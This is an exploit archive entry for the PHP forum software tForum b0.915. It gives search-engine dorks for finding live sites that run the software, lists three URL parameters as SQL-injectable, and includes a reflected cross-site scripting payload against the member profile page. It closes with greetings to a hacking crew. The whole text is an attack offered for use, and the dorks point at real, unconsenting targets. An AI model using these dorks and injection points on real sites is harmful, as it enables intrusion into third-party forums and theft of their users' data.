tForum b0.915 Vulnerabilities

2011-12-26T00:00:00
ID 1337DAY-ID-17308
Type zdt
Reporter snup
Modified 2011-12-26T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: tForum b0.915 Vulnerabilities
# Dork: intext:"powered by tForum b0.915"
# Author: snup
# Contact: [email protected]

 SQL Injection:

 DORK:
  inurl:"viewtopic.php?TopicID=" intext:"powered by tForum b0.915"
  inurl:"viewboard.php?BoardID=" intext:"powered by tForum b0.915"
  inurl:"viewcat.php?CatID=" intext:"powered by tForum b0.915"

 BUG:
  http://127.0.0.1/viewtopic.php?TopicID=[sqli]
  http://127.0.0.1/viewboard.php?BoardID=[sqli]
  http://127.0.0.1/viewcat.php?CatID=[sqli]

 XSS:

 DORK:
  inurl:"username=" intext:"powered by tForum b0.915"

 BUG:
  http://127.0.0.1/member.php?Action=viewprofile&username=<script>alert(1337)</script>

===========
= Gr33tz: =
====================================================
= agilob, cOnd, czoik, drummachina, gocys, prick   =
= im2ee, MadCow, n1k0n3r, R3w, rtgn, SiD, vizzdoom =
= Inj3ct0r Team 1337day.com irc.freenode.net #pakamera                       =
====================================================



#  0day.today [2018-03-02]  #